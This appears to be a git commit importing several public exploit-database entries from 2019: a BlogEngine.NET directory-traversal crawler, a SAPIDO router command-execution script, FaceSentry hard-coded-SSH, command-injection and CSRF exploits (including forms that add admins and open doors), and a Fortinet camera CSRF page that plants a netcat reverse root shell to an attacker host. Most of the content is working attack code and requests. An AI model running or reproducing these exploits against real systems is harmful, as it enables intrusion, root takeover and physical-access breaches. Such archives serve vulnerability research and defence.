Commit b8a11af7 authored by Devon Kearns's avatar Devon Kearns

New upstream version 20190702

parent 9aa5c212
# Exploit Title: Directory Traversal on BlogEngine.NET
# Date: 24 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10717
1. Description
==============
BlogEngine.NET is vulnerable to a directory traversal. The page parameter, passed to /api/filemanager, reveals the contents of the directory.
2. Proof of Concept
=============
Log in to the application and submit a GET request to /api/filemanager:
Request:
~~~
GET /api/filemanager?path=/../../ HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: $COOKIE
Connection: close
Upgrade-Insecure-Requests: 1
~~~
Depending on how the request is submitted, the response may be XML or JSON
XML Response
~~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 01:58:46 GMT
Connection: close
Content-Length: 13030
<ArrayOfFileInstance xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/BlogEngine.Core.FileSystem">
<FileInstance>
<Created>5/14/2019 6:58:46 PM</Created>
<FileSize></FileSize>
<FileType>Directory</FileType>
<FullPath>~/App_Data/files/../..</FullPath>
<IsChecked>false</IsChecked>
<Name>...</Name>
<SortOrder>0</SortOrder>
</FileInstance>
...
~~~
JSON Response
~~~
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 15 May 2019 02:35:13 GMT
Connection: close
Content-Length: 10011
[
{
"IsChecked":false,
"SortOrder":0,
"Created":"5/14/2019 7:35:13 PM",
"Name":"...",
"FileSize":"",
"FileType":0,
"FullPath":"~/App_Data/files/../..",
"ImgPlaceholder":""
}
...
~~~
import argparse
import json
import os
import re
import requests
import sys
"""
Exploit for CVE-2019-10717
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop
Outputs list of filenames found in web root
python exploit.py -t $RHOST
?path=/../..
/../../archive.aspx
/../../archive.aspx.cs
/../../archive.aspx.designer.cs
/../../BlogEngine.NET.csproj
/../../BlogEngine.NET.csproj.user
/../../contact.aspx
/../../contact.aspx.cs
/../../contact.aspx.designer.cs
"""
urls = {
"login": "/Account/login.aspx",
"traversal": "/api/filemanager"
}
def make_request(session, method, target, data={}):
proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
}
if method == 'GET':
r = requests.Request(method, target, params=data)
elif method == 'POST':
r = requests.Request(method, target, data=data)
prep = session.prepare_request(r)
resp = session.send(prep, verify=False, proxies=proxies)
return resp.text
def login(session, host, user, passwd):
resp = make_request(session, 'GET', host+urls.get('login'))
login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
login_data = dict([(i[0],i[2]) for i in login_form])
login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
resp = make_request(session, 'POST', host+urls.get('login'), login_data)
def parse(body, path, outfile):
paths = json.loads(body)
new_paths = set()
for i in paths:
if i.get('FileType') == 0:
new_paths.add(i.get('FullPath'))
else:
outfile.write("{path}\n".format(path=i.get('FullPath')))
return new_paths
def traverse(session, host, paths, outfile, visited=set()):
paths = set(paths) - visited
for path in paths:
print path
outfile.write("\n?path={path}\n".format(path=path))
visited.add(path)
resp = make_request(session, 'GET', host+urls.get('traversal'), data=dict(path=path))
new_paths = parse(resp, path, outfile)
if new_paths:
traverse(session, host, new_paths, outfile, visited)
def main(host, user, passwd, root, outfile):
with requests.Session() as s:
login(s, host, user, passwd)
traverse(s, host, root, outfile)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2019-10717 Path traversal')
parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account on blog')
parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
parser.add_argument('-r', '--root', nargs='+', default="/../..", help='Starting paths')
parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
parser.add_argument('-o', '--outfile', type=argparse.FileType('w'), default='CVE-2019-10717.txt')
args = parser.parse_args()
protocol = "https://" if args.ssl else "http://"
if isinstance(args.root, str):
args.root = [args.root]
main(protocol + args.target, args.user, args.passwd, args.root, args.outfile)
\ No newline at end of file
# Exploit Title: SAPIDO RB-1732 command line execution
# Date: 2019-6-24
# Exploit Author: k1nm3n.aotoi
# Vendor Homepage: http://www.sapido.com.tw/
# Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin
# Version: RB-1732 V2.0.43
# Tested on: linux
import requests
import sys
def test_httpcommand(ip, command):
my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)
content = r.text
content = content[
content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:
content.rfind('</textarea>')]
return content
print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))
\ No newline at end of file
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit
#
#
# Vendor: iWT Ltd.
# Product web page: http://www.iwt.com.hk
# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
# Firmware 5.7.2 build 568 (Algorithm A14)
# Firmware 5.7.0 build 539 (Algorithm A14)
#
# Summary: FaceSentry 5AN is a revolutionary smart identity
# management appliance that offers entry via biometric face
# identification, contactless smart card, staff ID, or QR-code.
# The QR-code upgrade allows you to share an eKey with guests
# while you're away from your Office and monitor all activity
# via the web administration tool. Powered by standard PoE
# (Power over Ethernet), FaceSEntry 5AN can be installed in
# minutes with only 6 screws. FaceSentry 5AN is a true enterprise
# grade access control or time-and-attendance appliance.
#
# Desc: FaceSentry facial biometric access control appliance
# ships with hard-coded and weak credentials for SSH access
# on port 23445 using the credentials wwwuser:123456. The root
# privilege escalation is done by abusing the insecure sudoers
# entry file.
#
# ================================================================
# lqwrm@metalgear:~$ python ssh_root.py 192.168.11.1
# [+] Connecting to 192.168.11.1 on port 23445: Done
# [*] wwwuser@192.168.11.1:
# Distro Ubuntu 16.04
# OS: linux
# Arch: Unknown
# Version: 4.10.0
# ASLR: Enabled
# Note: Susceptible to ASLR ulimit trick (CVE-2016-3672)
# [+] Opening new channel: 'shell': Done
# [*] Switching to interactive mode
# wwwuser@TWR01:~$ pwd
# /home/wwwuser
# wwwuser@TWR01:~$ sudo -l
# Matching Defaults entries for wwwuser on localhost:
# env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
#
# User wwwuser may run the following commands on localhost:
# (root) NOPASSWD: /sbin/service, PROCESSES, NETWORKING, REBOOT, IPTABLES, /faceGuard/bin/*, /faceGuard/database/Restore*, /bin/date, /bin/cat, /bin/echo, /faceGuard/bin/phpbin/*, /bin/sed, /sbin/*, /usr/sbin/*, /bin/*, /usr/bin/*
# wwwuser@TWR01:~$ sudo cat /etc/sudoers.d/sudoers.sentry
# Cmnd_Alias SENTRY = /faceGuard/bin/*
# Cmnd_Alias SENTRY_DB_RESTORE = /faceGuard/database/Restore*
# Cmnd_Alias DATE = /bin/date
# Cmnd_Alias CAT = /bin/cat
# Cmnd_Alias ECHO = /bin/echo
# Cmnd_Alias PRINTING = /usr/sbin/lpc, /usr/bin/lprm
# Cmnd_Alias SENTRYWEB = /faceGuard/bin/phpbin/*
# Cmnd_Alias SED = /bin/sed
# Cmnd_Alias SERVICES = /sbin/service
# Cmnd_Alias SBIN = /sbin/*, /usr/sbin/*
# Cmnd_Alias BIN = /bin/*, /usr/bin/*
#
# wwwuser ALL=NOPASSWD: SERVICES, PROCESSES, NETWORKING, REBOOT, IPTABLES, SENTRY, SENTRY_DB_RESTORE, DATE, CAT, ECHO, SENTRYWEB, SED, SBIN, BIN
# iwtuser ALL=NOPASSWD: SERVICES, PROCESSES, NETWORKING, REBOOT, IPTABLES, SENTRY, SENTRY_DB_RESTORE, DATE, CAT, ECHO, SENTRYWEB, SED, SBIN, BIN
# wwwuser@TWR01:~$ id
# uid=1001(wwwuser) gid=1001(wwwuser) groups=1001(wwwuser),27(sudo)
# wwwuser@TWR01:~$ sudo su
# root@TWR01:/home/wwwuser# id
# uid=0(root) gid=0(root) groups=0(root)
# root@TWR01:/home/wwwuser# exit
# exit
# wwwuser@TWR01:~$ exit
# logout
# [*] Got EOF while reading in interactive
# [*] Closed SSH channel with 192.168.11.1
# lqwrm@metalgear:~$
# ================================================================
#
# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
# Linux 3.4.113-sun8i (armv7l)
# PHP/7.0.30-0ubuntu0.16.04.1
# PHP/7.0.22-0ubuntu0.16.04.1
# lighttpd/1.4.35
# Armbian 5.38
# Sunxi Linux (sun8i generation)
# Orange Pi PC +
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5526
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5526.php
#
#
# 28.05.2019
#
from pwn import *
if len(sys.argv) < 2:
print 'Usage: ./fs.py <ip>\n'
sys.exit()
ip = sys.argv[1]
rshell = ssh('wwwuser', ip, password='123456', port=23445)
rshell.interactive()
\ No newline at end of file
# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
# Date: 2019-06-19
# Exploit Author: @XORcat
# Vendor Homepage: https://fortinet.com/
# Software Link: Customer Account Required
# Version: v1.2.0.0
# Tested on: Linux
# CVE : TBA
<html>
<!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat)
Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/
Follow the following steps to demonstrate this PoC:
1. Replace IP addresses in Javascript code to repr esent your testing
environment.
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
1337`
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
* Note: all modern browsers will cache Basic Authentication
credentials (such as those used by the FCM-MB40) even if the
FCM-MB40's administration page is closed.
4. Open the crafted HTML document using the "admin" user's
browser.
* Note: In an attack scenario, this step would be performed by
implanting the code into a legitimate webpage that the "admin"
user visits, or by tricking the "admin" user into opening a page
which includes the code.
5. Note that the `netcat` listener established in step 2. has received
a connection from the camera, and that it is presenting a `/bin/sh`
session as root.
* Note: type `id` in the `netcat` connection to verify this.
_Note: After this issue has been exploited, the state of the system will
have changed, and future exploitation attempts may require
modification._
-->
<head>
<script>
const sleep = (milliseconds) => {
return new Promise(resolve => setTimeout(resolve, milliseconds))
};
var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';
var sed_img = document.createElement("img");
sed_img.src = sed_url;
sleep(400).then(() => {
var execute_img = document.createElement("img");
execute_img.src = execute_url;
});
</script>
</head>
<body>
<h1>Welcome to my non-malicious website.</h1>
</body>
</html>
\ No newline at end of file
FaceSentry Access Control System 6.4.8 Remote Command Injection
Vendor: iWT Ltd.
Product web page: http://www.iwt.com.hk
Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
Firmware 5.7.2 build 568 (Algorithm A14)
Firmware 5.7.0 build 539 (Algorithm A14)
Summary: FaceSentry 5AN is a revolutionary smart identity
management appliance that offers entry via biometric face
identification, contactless smart card, staff ID, or QR-code.
The QR-code upgrade allows you to share an eKey with guests
while you're away from your Office and monitor all activity
via the web administration tool. Powered by standard PoE
(Power over Ethernet), FaceSEntry 5AN can be installed in
minutes with only 6 screws. FaceSentry 5AN is a true enterprise
grade access control or time-and-attendance appliance.
Desc: FaceSentry suffers from an authenticated OS command
injection vulnerability using default credentials. This can
be exploited to inject and execute arbitrary shell commands
as the root user via the 'strInIP' and 'strInPort' parameters
(POST) in pingTest and tcpPortTest PHP scripts.
==============================================================
/pingTest.php:
--------------
8: if (!isAuth('TestTools','R')){
9: echo "No Permission";
10: include("footer.php");
11: exit;
12: }
13:
14: if(isset($_POST["strInIP"])){
15: $strInIP = $_POST["strInIP"];
16: }else{
17: $strInIP = "";
18: }
19:
20: $strOperationResult = "";
21: if ($strInIP != ""){
22:
23: $out = array();
24: exec("sudo ping -c 4 $strInIP",$out);
25: $result = "";
26: foreach($out as $line){
27: $result = $result.$line."<br>";
28: }
--------------------------------------------------------------
/tcpPortTest.php:
-----------------
14: if (isset($_POST["strInIP"])){
15: $strInIP = $_POST["strInIP"];
16: }else{
17: $strInIP = "";
18: }
19: if (isset($_POST["strInPort"])){
20: $strInPort = $_POST["strInPort"];
21: }else{
22: $strInPort = "";
23: }
..
..
53: $strOperationResult = "";
54: if ($strInIP != "" and $strInPort != ""){
55: $fp = fsockopen($strInIP, $strInPort, $errno, $errstr, 10);
56: system("date>>".TCP_PORT_TEST);
57: if (!$fp) {
58: $strOperationResult = getDisplay("TestTools.TCPPortTestFail")." $errstr ($errno)";
59: system("echo -e \"Unable to connect to $strInIP:$strInPort\">>".TCP_PORT_TEST);
60: } else {
61: fclose($fp);
62: $strOperationResult = getDisplay("TestTools.TCPPortTestSucces");
63: system("echo -e \"Successfully connected to $strInIP:$strInPort\">>".TCP_PORT_TEST);
64: }
65: }
==============================================================
Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
Linux 3.4.113-sun8i (armv7l)
PHP/7.0.30-0ubuntu0.16.04.1
PHP/7.0.22-0ubuntu0.16.04.1
lighttpd/1.4.35
Armbian 5.38
Sunxi Linux (sun8i generation)
Orange Pi PC +
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5523
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5523.php
28.05.2019
--
$ curl -X POST 'http://192.168.11.1/tcpPortTest.php' \
--data 'strInIP=1.2.3.4`sudo id > garbage.txt`&strInPort=80' \
-H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3'
$ curl http://192.168.11.1/garbage.txt
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------------------------------------
$ curl -X POST 'http://192.168.11.1/pingTest.php' \
--data 'strInIP=;sudo id' \
-H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3' \
|grep uid
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 7726 0 7697 100 29 10180 38 --:--:-- --:--:-- --:--:-- 10181
<font color='red'>Ping Test Fail! (;sudo id)<br>uid=0(root) gid=0(root) groups=0(root)<br></font><div id="six_tab_pages_nav" class="six_tab_pages_nav">
\ No newline at end of file
FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery
Vendor: iWT Ltd.
Product web page: http://www.iwt.com.hk
Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
Firmware 5.7.2 build 568 (Algorithm A14)
Firmware 5.7.0 build 539 (Algorithm A14)
Summary: FaceSentry 5AN is a revolutionary smart identity
management appliance that offers entry via biometric face
identification, contactless smart card, staff ID, or QR-code.
The QR-code upgrade allows you to share an eKey with guests
while you're away from your Office and monitor all activity
via the web administration tool. Powered by standard PoE
(Power over Ethernet), FaceSEntry 5AN can be installed in
minutes with only 6 screws. FaceSentry 5AN is a true enterprise
grade access control or time-and-attendance appliance.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
Linux 3.4.113-sun8i (armv7l)
PHP/7.0.30-0ubuntu0.16.04.1
PHP/7.0.22-0ubuntu0.16.04.1
lighttpd/1.4.35
Armbian 5.38
Sunxi Linux (sun8i generation)
Orange Pi PC +
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5524
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5524.php
28.05.2019
--
CSRF change administrator password:
-----------------------------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/personalSetting.php" method="POST">
<input type="hidden" name="strInAction" value="updateUser" />
<input type="hidden" name="strInUserID" value="administrator" />
<input type="hidden" name="isChangePwd" value="1" />
<input type="hidden" name="strInLanguage" value="Eng" />
<input type="hidden" name="strInPassword" value="t00tw00t />
<input type="hidden" name="strInConfirmPassword" value="t00tw00t" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
CSRF add admin:
---------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/userList.php?" method="POST">
<input type="hidden" name="strInAction" value="addUser" />
<input type="hidden" name="strInUserID" value="Testinugs" />
<input type="hidden" name="strInUserFunctionPermissionGroupID" value="Admin" />
<input type="hidden" name="strInDescription" value="CSRFd" />
<input type="hidden" name="strInLanguage" value="Eng" />
<input type="hidden" name="strInPassword" value="123123" />
<input type="hidden" name="strInConfirmPassword" value="123123" />
<input type="hidden" name="strInStatus" value="Active" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Change administrator password via different path:
-------------------------------------------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/userList.php?" method="POST">
<input type="hidden" name="strInAction" value="updateUser" />
<input type="hidden" name="strInPageNo" value="0" />
<input type="hidden" name="strInUserID" value="administrator" />
<input type="hidden" name="isChangePwd" value="1" />
<input type="hidden" name="strInDescription" value="Default&#32;Sys&#46;&#32;Admin" />
<input type="hidden" name="strInUserFunctionPermissionGroupID" value="Admin" />
<input type="hidden" name="strInLanguage" value="Eng" />
<input type="hidden" name="strInStatus" value="Active" />
<input type="hidden" name="strInPassword" value="123456" />
<input type="hidden" name="strInConfirmPassword" value="123456" />
<input type="hidden" name="strEditPageNo" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Add special card:
-----------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/specialCard.php?" method="POST">
<input type="hidden" name="strInSpecialCardID" value="deadbeef" />
<input type="hidden" name="strInSpecialCardStatus" value="" />
<input type="hidden" name="strInSpecialCardEnrollHigh" value="1" />
<input type="hidden" name="strInSpecialCardEnrollLow" value="1" />
<input type="hidden" name="strInSpecialCardRescue" value="1" />
<input type="hidden" name="strInSpecialCardOpenDoor" value="1" />
<input type="hidden" name="strInSpecialCardReboot" value="1" />
<input type="hidden" name="strInSpecialCardShutDown" value="1" />
<input type="hidden" name="strInAction" value="addNewSpecialCard" />
<input type="hidden" name="strInPageNo" value="0" />
<input type="hidden" name="strEditPageNo" value="" />
<input type="hidden" name="strInNewSpecialCard" value="deadbeef" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
CSRF open door 0:
-----------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/openDoor.php?" method="POST">
<input type="hidden" name="strInAction" value="openDoor" />
<input type="hidden" name="strInPageNo" value="0" />
<input type="hidden" name="strInRestartAction" value="" />
<input type="hidden" name="strPanelIDRestart=" value="" />
<input type="hidden" name="strPanelRestartAction" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
\ No newline at end of file
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# FaceSentry Access Control System 6.4.8 Remote Root Exploit
#
#
# Vendor: iWT Ltd.
# Product web page: http://www.iwt.com.hk
# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
# Firmware 5.7.2 build 568 (Algorithm A14)
# Firmware 5.7.0 build 539 (Algorithm A14)
#
# Summary: FaceSentry 5AN is a revolutionary smart identity
# management appliance that offers entry via biometric face
# identification, contactless smart card, staff ID, or QR-code.
# The QR-code upgrade allows you to share an eKey with guests
# while you're away from your Office and monitor all activity
# via the web administration tool. Powered by standard PoE
# (Power over Ethernet), FaceSEntry 5AN can be installed in
# minutes with only 6 screws. FaceSentry 5AN is a true enterprise
# grade access control or time-and-attendance appliance.
#
# Desc: FaceSentry suffers from an authenticated OS command
# injection vulnerability using default credentials. This can
# be exploited to inject and execute arbitrary shell commands
# as the root user via the 'strInIP' POST parameter in pingTest
# PHP script.
#
# ==============================================================
# /pingTest.php:
# --------------
# 8: if (!isAuth('TestTools','R')){
# 9: echo "No Permission";
# 10: include("footer.php");
# 11: exit;
# 12: }
# 13:
# 14: if(isset($_POST["strInIP"])){
# 15: $strInIP = $_POST["strInIP"];
# 16: }else{
# 17: $strInIP = "";
# 18: }
# 19:
# 20: $strOperationResult = "";
# 21: if ($strInIP != ""){
# 22:
# 23: $out = array();
# 24: exec("sudo ping -c 4 $strInIP",$out);
# 25: $result = "";
# 26: foreach($out as $line){
# 27: $result = $result.$line."<br>";
# 28: }
# ==============================================================
#
# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
# Linux 3.4.113-sun8i (armv7l)
# PHP/7.0.30-0ubuntu0.16.04.1
# PHP/7.0.22-0ubuntu0.16.04.1
# lighttpd/1.4.35
# Armbian 5.38
# Sunxi Linux (sun8i generation)
# Orange Pi PC +
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5525
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php
#
#
# 28.05.2019